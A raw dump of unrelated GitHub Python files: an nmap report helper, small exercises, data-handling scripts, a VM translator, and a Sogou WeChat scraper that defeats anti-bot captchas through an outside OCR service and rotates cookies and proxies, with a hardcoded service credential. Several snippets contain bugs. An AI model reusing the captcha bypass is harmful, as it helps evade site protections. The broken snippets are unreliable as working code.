maxChars):\n wrappedText += curLine + os.linesep\n curLine = ''\n else:\n curLine = tmpLine\n # Make sure to add any text that didnt hit char limit\n return wrappedText + \" \" + tmpLine \n\ndef getNmapFiles(fileOrDir, recurse=False):\n if os.path.isdir(fileOrDir):\n return getFilesInDir(fileOrDir, filter=r'.*\\.xml$', recurse=recurse)\n else:\n return [fileOrDir]","repo_name":"ryanmrestivo/red-team","sub_path":"Reporting-Tools/nmap-parse-python/modules/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":12673,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"71250476534","text":"import re\r\ndef valid_email(email):\r\n pattern = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$'\r\n return True if re.match(pattern,email) else False\r\nemails=[\"vijay.kuamr@example.com\",\r\n \"arunaannam@gmail.com\",\r\n \"abhianav-email\",\r\n \"chandu.smith@gmail\",\r\n \"rohithbaddam\",\r\n \"priyak@123.45\"\r\n]\r\nfor i in emails:\r\n print(f'{i} is a valid email address' if valid_email(i) \\\r\n else f'{i} not a valid email address')\r\n","repo_name":"Vijaykumar069/Cognifyz_Technologies","sub_path":"CognifyzTechnologies/Level1Tasks/ValidEmail.py","file_name":"ValidEmail.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37546442045","text":"# !usr/bin/python\r\n# -*- coding:utf-8 -*-\r\n\r\ndef intersection1(nums1, nums2):\r\n \"\"\"\r\n :type nums1: List[int]\r\n :type nums2: List[int]\r\n :rtype: List[int]\r\n \"\"\"\r\n d = {}\r\n ans = []\r\n for num in nums1:\r\n d[num] = d.get(num, 0) + 1\r\n \r\n for num in nums2:\r\n if num in d:\r\n ans.append(num)\r\n del 
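The pattern in ValidEmail.py above anchors with ^ and $; re.fullmatch makes those anchors implicit, which is a common simplification. A sketch using the same character classes, checked against sample addresses from the snippet:

import re

EMAIL_RE = re.compile(r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}')

def valid_email(email):
    # fullmatch must consume the whole string, so ^/$ become unnecessary
    return EMAIL_RE.fullmatch(email) is not None

assert valid_email("arunaannam@gmail.com")
assert not valid_email("chandu.smith@gmail")  # no dot-separated TLD
assert not valid_email("priyak@123.45")       # TLD must be alphabetic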
d[num] # 存在便删除字典中的元素\r\n return ans\r\n\r\ndef intersection2(nums1, nums2):\r\n \"\"\"\r\n :type nums1: List[int]\r\n :type nums2: List[int]\r\n :rtype: List[int]\r\n \"\"\"\r\n nums1 = set(nums1)\r\n return [x for x in set(nums2) if x in nums1]\r\n\r\ndef main():\r\n nums1 = [1,2,2,1]\r\n nums2 = [2,2]\r\n print(intersection1(nums1, nums2))\r\n print(intersection2(nums1, nums2))\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"ywwill/LeetCode-Python","sub_path":"349.intersection-of-two-arrays/intersection-of-two-arrays.py","file_name":"intersection-of-two-arrays.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9801900493","text":"import pathlib\nimport pandas as pd\nfrom openpyxl import Workbook, load_workbook\nfrom openpyxl.utils.dataframe import dataframe_to_rows\n\ndata = {\n \"product name\": [\"product 1\", \"product 2\"],\n \"sales month 1\": [10, 20],\n \"sales month 2\": [5, 35],\n}\n\ndf = pd.DataFrame(data)\nprint(df)\n\nworkbook = Workbook()\nsheet = workbook.active\n\nfor row in dataframe_to_rows(df, index=False, header=True):\n sheet.append(row)\n\n\nfilepath = pathlib.Path.home().joinpath(\"Downloads/test14.xlsx\")\nworkbook.save(filepath)\n\nworkbook = load_workbook(filepath)\nsheet = workbook.active\nvalues = sheet.values\ndf = pd.DataFrame(values)\nprint(df)\n","repo_name":"tinylambda/keep","sub_path":"module_openpyxl/openpyxl_simple_with_pandas.py","file_name":"openpyxl_simple_with_pandas.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12900468456","text":"#This module is responsible for processing functions\n\npush_data = \"\\nD=M\\n@SP\\nA=M\\nM=D\\n@SP\\nM=M+1\\n\"\n\n#Handling command \"function f k\"\ndef function_declaration(func_name, local_vars):\n local_vars = int(local_vars)\n ret = \"(\" + func_name + \")\"\n while local_vars > 0:\n ret += \"\\n@SP\\nA=M\\nM=0\\n@SP\\nM=M+1\\n\"\n local_vars -= 1\n return ret\n\n#Handling command \"call f n\"\ndef function_call(func_name, args, ret_add):\n result = \"@\" + ret_add + push_data.replace('M','A',1) + \"@LCL\" + push_data + \"@ARG\" + push_data + \"@THIS\" + push_data + \"@THAT\" + push_data\n result += \"@SP\\nD=M\\n@LCL\\nM=D\\n@ARG\\n\"\n args = int(args)\n while args > 0:\n result += \"D=D-1\\n\"\n args -= 1\n for _ in range(5):\n result += \"D=D-1\\n\"\n result += (\"M=D\\n@\" + func_name + \"\\n0;JMP\\n\" + \"(\" + ret_add + \")\\n\")\n return result\n\n#Handling command \"return\" in a function\n#Load the return address first, then the value later.\ndef return_value():\n update_segments = [\"THAT\",\"THIS\",\"ARG\",\"LCL\",\"RET\"]\n result = \"@SP\\nA=M-1\\nD=M\\n@RETVAL\\nM=D\\n@LCL\\nD=M\\n@FRAME\\nM=D\\n@ARG\\n\"\n result += \"D=M\\n@SP\\nM=D+1\\n@FRAME\\nD=M\\n\"\n for segment in update_segments:\n result += (\"@\" + segment + \"\\nM=D-1\\nA=M\\nD=M\\n@\" + segment + \"\\nM=D\\n@FRAME\\nMD=M-1\\n\")\n result += \"@RETVAL\\nD=M\\n@SP\\nA=M-1\\nM=D\\n@RET\\nA=M;JMP\\n\"\n return result","repo_name":"HenryNg101/Nand2Tetris-solution","sub_path":"VM Translator/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37628336492","text":"import requests\nimport json\nimport pyrebase\nimport os\nfrom PIL import 
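In the openpyxl snippet above, reading sheet.values back yields the header as data row 0 (hence the integer column labels in the second print). A sketch that promotes that first row to column labels, assuming the sheet was written with header=True as shown:

import pandas as pd
from openpyxl import Workbook
from openpyxl.utils.dataframe import dataframe_to_rows

df = pd.DataFrame({"product name": ["product 1", "product 2"],
                   "sales month 1": [10, 20]})
wb = Workbook()
ws = wb.active
for row in dataframe_to_rows(df, index=False, header=True):
    ws.append(row)

rows = ws.values                # generator of row tuples
header = next(rows)             # first row is the header written above
print(pd.DataFrame(list(rows), columns=header))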
Image\n\n\"\"\"\n-------------------------------------------------------------------------------------------------\n---------Only these variables need to be adapted to process the desired output and data.---------\n-------------------------------------------------------------------------------------------------\n\"\"\"\n\nlogin_url = \"https://health.api.makia.ml/login\" # POST-Request to get JWT Token\ndata_url = \"https://health.api.makia.ml/rock\" # GET-Request to get Data from API\nimage_url = 'https://health.api.makia.ml/rock/image/' # GET-Request to get a specific picture with the hash-value\n\n# number of the homogenous area from when the images are to be downloaded\nfrom_number_of_hb = 0\n\n# TODO: insert correct username and password\npayload = json.dumps({\n \"username\": \".............\",\n \"password\": \".............\"\n})\n\n# credits for firebase initialization\n# TODO: insert right apiKey\ncredits = {\"apiKey\": \"...........................\",\n \"authDomain\": \"rock-ai-us-central1\",\n \"databaseURL\": \"https://rock-ai-db.firebaseio.com\",\n \"storageBucket\": \"rock-ai-us-central1\"\n }\n\n# this can be set as false if the json file 'raw_data.json' exists and then the json data is used for the following processing\nDOWNLOAD_DATA_FROM_ROCK_AI_API = False\n\nDOWNLOAD_PICTURES_FROM_API = False\nUPLOAD_PICTURES_TO_FIRESTORE = False # DOWNLOAD_PICTURES_FROM_API = True have to be setted\nSTORE_PICTURES_LOCALLY = False # DOWNLOAD_PICTURES_FROM_API = True have to be setted\nSAVE_LINK_FROM_EACH_FIRESTORE_PICTURE = False # Pictures already have to be store in the firebase storage\n\n# to generate the firebase_data.json file, the picture muss be uploaded to the firestore\n# and the SAVE_LINK_FROM_EACH_FIRESTORE_PICTURE = True must be setted\nGENERATE_FIRESTORE_DATA_JSON = False\n\nGENERATE_SINGLE_LABEL_CSV = True\nGENERATE_MULTI_LABEL_CSV = False\n\n# the images have to be store in ../Image_Augmentation/images locally\nGENERATE_LABELS_AUGMENTATION_IMAGES = True\n\nPRINT_INTERNAL_DATA_ARRAY = False\n\n\"\"\"\n-------------------------------------------------------------------------------------------------\n\"\"\"\n\n\n# prints the data, which is stored in the internal array\ndef print_data_array(data_array):\n i = 1\n for hb in data_array:\n print(f'{i} Homogenbereich:')\n print(f' Gebirgsverhaltenstyp = {hb[0]}')\n print(f' Vegetationseinfluss = {hb[1]}')\n print(f' Gefaehrdungsklasse = {hb[2]}\\n')\n i += 1\n\n\n# generate the json file of the whole data to upload it to a firebase firestore\ndef generate_json_string(data_array, image_links):\n i = 0\n json_string = '['\n for hb in data_array:\n if i == 41:\n continue\n json_string += '{\"gebirgsverhaltenstyp\": \"' + hb[0] + '\", \"vegetationseinfluss\": \"' + hb[1] \\\n + '\", \"gefaehrdungsklasse\": \"' + hb[2] + '\", \"images\": ['\n for img in image_links[i]:\n json_string += '\"' + img + '\",'\n\n json_string = json_string[:-1] + ']},'\n i += 1\n\n json_string = json_string[:-1] + ']'\n\n # write data into .json file\n with open('firebase_data.json', 'w') as file_object: # open the file in write mode\n json.dump(json.loads(json_string), file_object)\n\n\n# creates labels of all pictures in csv-format\ndef create_lables(imageHash_array, data_array, multilabeling):\n csv_data = []\n\n for i in range(len(imageHash_array)):\n for j in range(len(imageHash_array[i])):\n img_aug_index = 0\n\n if i < 10:\n i_string = '0' + str(i)\n else:\n i_string = str(i)\n if j < 10:\n j_string = '0' + str(j)\n else:\n j_string = str(j)\n\n # 
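generate_json_string above builds JSON by string concatenation and trailing-comma trimming, and its manual counter stops advancing at 41 (the continue skips the i += 1, so every later entry is dropped, not just one). A sketch of the same records built from plain dicts, assuming the intent is to skip only entry 41 and that image_links is index-aligned with data_array; json.dump then handles quoting and commas:

import json

def build_firebase_records(data_array, image_links, skip_index=41):
    records = []
    for i, hb in enumerate(data_array):
        if i == skip_index:        # skip the one non-data entry
            continue
        records.append({
            "gebirgsverhaltenstyp": hb[0],
            "vegetationseinfluss": hb[1],
            "gefaehrdungsklasse": hb[2],
            "images": list(image_links[i]),
        })
    return records

# with open('firebase_data.json', 'w') as f:
#     json.dump(build_firebase_records(data_array, imageLink_array), f)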
with this if, this pictures will be not labeled and are for reserved for testing\n # if not (i == 0 or i == 39 or i == 40 or (i == 13 and j == 0)):\n csv_line = f'gs://rock-ai-us-central1/images/image{i_string}_{j_string}.jpeg,{data_array[i][2]}'\n\n if multilabeling:\n csv_line += f',{data_array[i][0]},{data_array[i][1]}\\n'\n else:\n csv_line += '\\n'\n\n # print(csv_line)\n csv_data.append(csv_line)\n\n # generate labels for all augmented images\n if GENERATE_LABELS_AUGMENTATION_IMAGES:\n while os.path.isfile(f'../Image_Augmentation/images/image{i_string}_{j_string}_{img_aug_index}.jpeg'):\n csv_line = f'gs://rock-ai-us-central1/images_augmentation/image{i_string}_{j_string}_{img_aug_index}.jpeg,{data_array[i][2]}'\n\n if multilabeling:\n csv_line += f',{data_array[i][0]},{data_array[i][1]}\\n'\n else:\n csv_line += '\\n'\n\n csv_data.append(csv_line)\n img_aug_index += 1\n\n filename = \"multi_labels.csv\" if multilabeling else \"single_label.csv\"\n csv_file = open(filename, \"w\")\n csv_file.writelines(csv_data)\n csv_file.close()\n\n\n\"\"\"\n-------------------------------------------------------------------------------------------------\n-------------------------------------------MAIN METHOD-------------------------------------------\n-------------------------------------------------------------------------------------------------\n\"\"\"\nif __name__ == '__main__':\n if DOWNLOAD_DATA_FROM_ROCK_AI_API:\n print(\"Downloading data from API: \")\n headers = {\n 'Content-Type': 'application/json'\n }\n\n # post request with login data to get jwt-toke for authorization\n jwt_token = requests.request(\"POST\", login_url, headers=headers, data=payload)\n print(\"JWT-Token for Authorization: \", jwt_token.text)\n\n headers = {\n 'Authorization': 'Bearer ' + jwt_token.text,\n 'Content-Type': 'application/json'\n }\n\n # get the dataset from the API\n data = requests.request(\"GET\", data_url, headers=headers, data=payload)\n\n # write data into .json file\n with open('raw_data.json', 'w') as file_object: # open the file in write mode\n json.dump(data.json(), file_object)\n\n print(\"Downloading data from API finished!\")\n\n # ----------- store json data into array --------------\n # load request data from local json-file\n json_file = open(\"raw_data.json\")\n json_data_array = json.load(json_file)\n json_file.close()\n\n # in imageHash_array[1] and imageLink_array[1] are the corresponding images to the data in data_array[1] (same index)\n data_array = [] # ['gebirgsverhaltenstyp', 'vegetationseinfluss', 'gefaehrdungsklasse']\n imageHash_array = [] # [ImageHash 1, ImageHash 2, ...]\n imageLink_array = [] # [Imagelink 1, ImageLink 2, ...]\n\n i = 0\n for i in range(len(json_data_array)):\n if i == 41: # other data in the array\n continue\n hb = [json_data_array[i]['classificationManually']['gebirgsverhaltenstyp'],\n json_data_array[i]['classificationManually']['vegetationseinfluss'],\n json_data_array[i]['classificationManually']['gefaehrdungsklasse']]\n data_array.append(hb)\n\n j = 0\n image = []\n for j in range(len(json_data_array[i]['images'])):\n image.append(json_data_array[i]['images'][j])\n\n imageHash_array.append(image)\n\n if PRINT_INTERNAL_DATA_ARRAY:\n print_data_array(data_array)\n\n # ------ get images from API -------------\n\n # pictures from hb 41 and upwards get downloaded und into firestore uploaded\n for i in range(from_number_of_hb, len(imageHash_array)):\n j = 0\n links = []\n for j in range(len(imageHash_array[i])):\n # downloading pictures from URL\n if 
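The repeated "prepend '0' when the index is below 10" branches in this file are equivalent to a zero-padded format spec; a tiny demo producing the same image names:

for i, j in [(0, 7), (13, 0), (41, 12)]:
    print(f"image{i:02d}_{j:02d}.jpeg")
# image00_07.jpeg  image13_00.jpeg  image41_12.jpeg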
DOWNLOAD_PICTURES_FROM_API:\n print(f'Downloading images from API - HB {i}: ', end=\"\")\n image_url += + imageHash_array[i][j]\n image = requests.request(\"GET\", image_url, headers=headers, data=payload)\n print(\"finished\")\n\n # link: https://github.com/thisbejim/Pyrebase (import, if authentication rules are set)\n firebase = pyrebase.initialize_app(credits)\n storage = firebase.storage()\n\n # upload image to firestore\n if i < 10:\n i_string = '0' + str(i)\n else:\n i_string = str(i)\n if j < 10:\n j_string = '0' + str(j)\n else:\n j_string = str(j)\n\n # Upload pictures\n if UPLOAD_PICTURES_TO_FIRESTORE:\n print(f'Uploading images from HB {i} to Firebase Storage: ', end=\"\")\n storage.child(f'images/image{i_string}_{j_string}.jpeg').put(f'images/image{i}_{j}.jpeg')\n print(\"finished\")\n\n # store picture token to get access via url\n if SAVE_LINK_FROM_EACH_FIRESTORE_PICTURE:\n links.append(storage.child(f'images/image{i_string}_{j_string}.jpeg').get_url('idToken'))\n\n # save pictures locally\n if STORE_PICTURES_LOCALLY:\n file = open(f'images/image{i_string}_{j_string}.jpeg', \"wb\")\n file.write(image.content)\n file.close()\n\n imageLink_array.append(links)\n\n if GENERATE_SINGLE_LABEL_CSV:\n print('\\nCreating single-labels: ', end=\"\")\n create_lables(imageHash_array, data_array, False)\n print('finished')\n\n if GENERATE_MULTI_LABEL_CSV:\n print('\\nCreating multi-labels: ', end=\"\")\n create_lables(imageHash_array, data_array, True)\n print('finished')\n\n if GENERATE_FIRESTORE_DATA_JSON:\n print('\\nStart generating json-string and file: ', end=\"\")\n generate_json_string(data_array, imageLink_array)\n print('finished')\n\n print('\\nWhole process is finished!')\n","repo_name":"ManuelSperl/Rock-AI","sub_path":"Rock-AI-Backend/API_Requests/API_Request_generateJSON.py","file_name":"API_Request_generateJSON.py","file_ext":"py","file_size_in_byte":9986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16111007665","text":"import numpy as np\ninputs = tf.keras.Input(shape=(3, 1))\nlstm = layers.LSTM(1, return_sequences=True)(inputs)\nmodel_lstm_1 = tf.keras.models.Model(inputs=inputs, outputs=lstm)\ninputs = tf.keras.Input(shape=(3, 1)) \nlstm = layers.LSTM(1, return_sequences=False)(inputs)\nmodel_lstm_2 = tf.keras.models.Model(inputs=inputs, outputs=lstm)\n#Sequences t1, t2, and t3 \ndata = [[[0.1]\n [0.2],\n [0.3]]]\nprint(data)\nprint(\"output when return_sequencesis set to True\",model_lstm_1.predict(data))\nprint(\"output when return_sequencesis set to False\",model_lstm_2.predict(data))\n\n\n\n\n\n","repo_name":"msaluck/ml-huawei-lab","sub_path":"deeplearning-lab/Deep Learning/Common Modules of TensorFlow 2/Model Building/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10678649412","text":"import numpy as np\n\n# ----------------------------------------------------------------\ndef h5getstr(fid, name):\n if type(fid) is str:\n fid = h5py.File(fid,'r')\n\n dsetid = fid.get(name)\n if not dsetid:\n return ''\n\n # NOTE: This next step used to be the intuitive\n # val = dsetid.value\n # Now you get a bizarre warning if you use it: H5pyDeprecationWarning: dataset.value has been deprecated. 
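The return_sequences snippet just above is not runnable as written: it never imports tensorflow or layers, and data is missing a comma after [0.1]. A corrected sketch that also prints the output shapes, which is where the two flags differ:

import numpy as np
import tensorflow as tf
from tensorflow.keras import layers

inputs = tf.keras.Input(shape=(3, 1))
seq = layers.LSTM(1, return_sequences=True)(inputs)    # one output per time step
last = layers.LSTM(1, return_sequences=False)(inputs)  # final step only
model_seq = tf.keras.Model(inputs, seq)
model_last = tf.keras.Model(inputs, last)

data = np.array([[[0.1], [0.2], [0.3]]])   # note the comma the original omits
print(model_seq.predict(data).shape)       # (1, 3, 1)
print(model_last.predict(data).shape)      # (1, 1)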
Use dataset[()] instead\n # Replacing with the following line will get rid of the annoying warning\n val = dsetid[()] # new notation\n\n valbytes = val.tostring()\n valstr = valbytes.decode()\n\n if type(fid) is str:\n fid.close()\n\n return valstr\n","repo_name":"BUNPC/Homer3","sub_path":"DataTree/AcquiredData/DataFiles/Hdf5/hdf5lib.py","file_name":"hdf5lib.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"21"} +{"seq_id":"1878803907","text":"#! /usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport base64\nimport random\nimport time\nimport json\nimport re\nfrom urllib.parse import quote\nimport hashlib\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nfrom service.core.utils.http_ import Requester\nfrom service.db.utils.redis_utils import RedisClient\nfrom service.exception import retry\nfrom service.exception.exceptions import *\nfrom service import logger\nfrom service.micro.utils import ua\nfrom service.micro.utils.cookie_utils import dict_to_cookie_jar, cookie_jar_to_dict\nfrom service.micro.utils.math_utils import wechat_date_next, to_json\n\n\nclass SouGouGongZhongHaoSpider(object):\n __name__ = 'Sou Gou G ong Zhong Hao'\n\n def __init__(self, params=None):\n self.params = params\n self.ua = ua()\n self.cookies = self.get_cookie()\n self.requester = Requester(cookie=dict_to_cookie_jar(self.cookies), timeout=20)\n self.account = self.params.get(\"account\")\n\n def get_cookie(self):\n redis_cli = RedisClient('cookies', 'wechat')\n return redis_cli.return_choice_cookie()\n\n def next_cookie(self):\n cookie = dict_to_cookie_jar(self.get_cookie())\n self.requester = Requester(cookie=cookie, timeout=15)\n\n def update_cookie(self, snuid):\n cookie_dic = self.requester.cookie()\n cookie_dic.update(SNUID=snuid)\n cookie_dic = json.dumps(cookie_dic)\n self.requester = Requester(cookie=dict_to_cookie_jar(cookie_dic), timeout=15)\n\n def random_num(self):\n return random.uniform(1, 3)\n\n def retrun_md5(self, s):\n m = hashlib.md5()\n m.update(s.encode(\"utf-8\"))\n return m.hexdigest()\n\n def query(self):\n data = self.get_gongzhonghao_data()\n if data:\n return dict(\n status=200,\n msg=\"success\",\n result=data\n )\n else:\n return dict(\n status=200,\n msg=\"暂无公众号信息\"\n )\n\n @retry(max_retries=3, exceptions=(HttpInternalServerError, TimedOutError, RequestFailureError), time_to_sleep=0.5)\n def get_gongzhonghao_data(self):\n logger.info(\"{} Begin get gong zhong hao...\".format(self.__name__))\n url = \"https://weixin.sogou.com/weixin?type=1&s_from=input&query={}&ie=utf8&_sug_=n&_sug_type_=\".format(\n quote(self.account))\n headers = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36\",\n 'Connection': 'keep-alive',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Host': 'weixin.sogou.com',\n 'Referer': \"https://weixin.sogou.com/weixin?type=1&s_from=input&query={}&ie=utf8&_sug_=n&_sug_type_=\".format(\n quote(self.account))\n }\n try:\n data_list = []\n resp = self.requester.get(url, header_dict=headers)\n if 'charset=\"utf-8\"' in resp.text:\n resp.encoding = \"utf-8\"\n if \"用户您好,我们的系统检测到您网络中存在异常访问请求\" in resp.text:\n captcha_code = self.get_captcha_code(self.account)\n is_ok = self.verify_captcha_code(captcha_code, self.account)\n 
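h5getstr above never imports h5py, and the close-on-string check at the end compares the reassigned fid (a File object by then) against str, so a handle opened from a path is never closed. A sketch of the same read with a context manager; numpy's tobytes() replaces the deprecated tostring():

import h5py  # missing from the original module, which only imports numpy

def h5getstr(path, name):
    with h5py.File(path, "r") as fid:
        dset = fid.get(name)
        if dset is None:
            return ""
        val = dset[()]
        # arrays need tobytes() first; fixed-length strings come back as bytes
        return (val.tobytes() if hasattr(val, "tobytes") else val).decode()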
raise RequestFailureError\n elif self.account in resp.text and resp.text.find(\"account_article_0\"):\n soup = BeautifulSoup(resp.text, \"lxml\")\n li_obj_list = soup.find_all(\"li\", attrs={\"id\": True})\n i = 0\n for li_obj in li_obj_list:\n try:\n title = li_obj.find(\"a\", attrs={\"uigs\": \"account_article_{}\".format(i)}).text.strip()\n except:\n continue\n gong_zhong_hao = li_obj.find(\"a\", attrs={\"uigs\": \"account_name_{}\".format(i)}).text.strip()\n zifuchuo = re.findall(r\"timeConvert\\('(\\d+)'\\)\", li_obj.text)\n aid = self.retrun_md5(zifuchuo[0])\n article_date = datetime.strptime(\n time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(int(zifuchuo[0]))), \"%Y-%m-%d %H:%M:%S\")\n url = 'https://weixin.sogou.com' + li_obj.find(\"a\", attrs={\"uigs\": \"account_article_{}\".format(i)}).attrs.get(\n \"href\")\n b = random.randint(0, 99)\n a = url.index('url=')\n a = url[a + 25 + b:a + 26 + b:]\n url += '&k=' + str(b) + '&h=' + a\n wechat_num = li_obj.find(\"label\", attrs={\"name\": \"em_weixinhao\"}).text.strip()\n profile_meta = li_obj.find(\"dd\").text.strip()\n data = dict(\n gong_zhong_hao=gong_zhong_hao,\n title=title,\n article_date=article_date,\n url=url,\n aid=aid,\n wechat_num=wechat_num,\n profile_meta=profile_meta\n )\n data_list.append(data)\n i += 1\n return data_list\n else:\n logger.info(\"gei wechat gong zhong hao failed\")\n self.next_cookie()\n self.requester.use_proxy()\n raise RequestFailureError\n except Exception as e:\n logger.exception(e)\n self.requester.use_proxy()\n raise RequestFailureError\n\n @retry(max_retries=3, exceptions=(CaptchaVerifiedError,), time_to_sleep=1)\n def get_captcha_code(self, keyword):\n logger.info('%s Processing recognize captcha code ' % (self.__name__,))\n url = \"https://weixin.sogou.com/antispider/util/seccode.php\"\n quo = \"input&query={}&ie=utf8&_sug_=n&_sug_type_=\".format(keyword)\n headers = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36\",\n 'Connection': 'keep-alive',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Host': 'weixin.sogou.com',\n 'Referer': \"https://weixin.sogou.com/antispider/?from=/weixin?type=2&s_from={}\".format(quote(quo))\n }\n resp = self.requester.get(url, header_dict=headers)\n if resp:\n res = base64.b64encode(resp.content).decode()\n captcha_code = self.ocr_captcha_code(res)\n return captcha_code\n\n @retry(max_retries=3, exceptions=(HttpInternalServerError, TimedOutError, RequestFailureError), time_to_sleep=2)\n def verify_captcha_code(self, captcha_code, keyword):\n url = \"https://weixin.sogou.com/antispider/thank.php\"\n quo = \"input&query={}&ie=utf8&_sug_=n&_sug_type_=\".format(keyword)\n headers = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36\",\n 'Connection': 'keep-alive',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Host': 'weixin.sogou.com',\n 'Referer': \"https://weixin.sogou.com/antispider/?from=/weixin?type=2&s_from={}\".format(quote(quo))\n }\n data = {\n \"c\": captcha_code,\n \"r\": 
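The article-date conversion above formats the scraped epoch seconds with time.strftime and immediately re-parses the string with datetime.strptime; datetime.fromtimestamp collapses that round trip (the timestamp value below is made up):

from datetime import datetime

ts = "1561532400"                       # hypothetical timeConvert('...') capture
print(datetime.fromtimestamp(int(ts)))  # same local-time result, one call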
\"https://weixin.sogou.com/antispider/?from=/weixin?type=2&s_from={}\".format(quote(quo)),\n \"v\": 5\n }\n response = self.requester.post(url, header_dict=headers, data_dict=data)\n response.encoding = \"utf-8\"\n result_data = to_json(response.text)\n logger.info(\"result_data : {}\".format(result_data))\n result_code = result_data.get('code', None)\n if result_code == 0:\n snuid = data.get(\"id\")\n self.update_cookie(snuid)\n return True\n else:\n logger.error('verify captcha code failed. ')\n captcha_code = self.get_captcha_code(keyword)\n return self.verify_captcha_code(captcha_code, keyword)\n\n @retry(max_retries=3, exceptions=(HttpInternalServerError, TimedOutError, RequestFailureError), time_to_sleep=2)\n def ocr_captcha_code(self, base_str):\n url = 'https://nmd-ai.juxinli.com/ocr_captcha'\n headers = {'Content-Type': 'application/json'}\n data = {\n \"image_base64\": base_str,\n \"app_id\": \"71116455&VIP@NzExMTY0NTUmVklQ\",\n \"ocr_code\": \"0000\"\n }\n try:\n req = self.requester.post(url=url, data_dict=data, submission_type=\"json\", header_dict=headers).json()\n logger.info(\"get captcha code success resp :{}\".format(req))\n if req.get(\"errorcode\") == 0:\n return req.get(\"string\")\n else:\n raise HttpInternalServerError\n except Exception as e:\n raise e\n\n\ndef get_handler(*args, **kwargs):\n return SouGouGongZhongHaoSpider(*args, **kwargs)\n","repo_name":"gaoyuan3593/lyricalSpider_docker","sub_path":"service/micro/wechat/sougou_gzh.py","file_name":"sougou_gzh.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41121772151","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport random\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom mt_ie import seq2seq\nfrom mt_ie import data_utils\n\n\nclass Seq2SeqModel(object):\n\n def __init__(self,\n source_vocab_size,\n target_vocab_size,\n encoder_length,\n decoder_length,\n size,\n num_layers,\n max_gradient_norm,\n batch_size,\n learning_rate,\n learning_rate_decay_factor,\n beam_size=1,\n num_samples=1024,\n use_dropout=False,\n use_adam_opt=False,\n do_decode=False,\n dtype=tf.float32):\n with tf.variable_scope(\"seq2seq_model_initialization\"):\n self.source_vocab_size = source_vocab_size\n self.target_vocab_size = target_vocab_size\n self.encoder_length = encoder_length\n self.decoder_length = decoder_length + 1 # Include the EOS symbol.\n self.beam_size = beam_size\n self.batch_size = None\n self.learning_rate = tf.get_variable(\n \"learning_rate\", [],\n trainable=False,\n dtype=dtype,\n initializer=tf.constant_initializer(learning_rate))\n self.learning_rate_decay_op = self.learning_rate.assign(\n self.learning_rate * learning_rate_decay_factor)\n self.global_step = tf.get_variable(\n \"global_step\", [],\n trainable=False,\n initializer=tf.constant_initializer(0))\n self.val_best = tf.get_variable(\n \"val_best\", [],\n trainable=False,\n initializer=tf.constant_initializer(0.0))\n\n # Create an output projection for sampled softmax.\n output_projection = None\n softmax_loss_function = None\n if num_samples > 0 and num_samples < self.target_vocab_size:\n # The default variable initializer is uniform_unit_scaling_initializer.\n w = tf.get_variable(\"proj_w\", [size, self.target_vocab_size],\n dtype=dtype)\n w_t = tf.transpose(w)\n b = tf.get_variable(\"proj_b\", [self.target_vocab_size], 
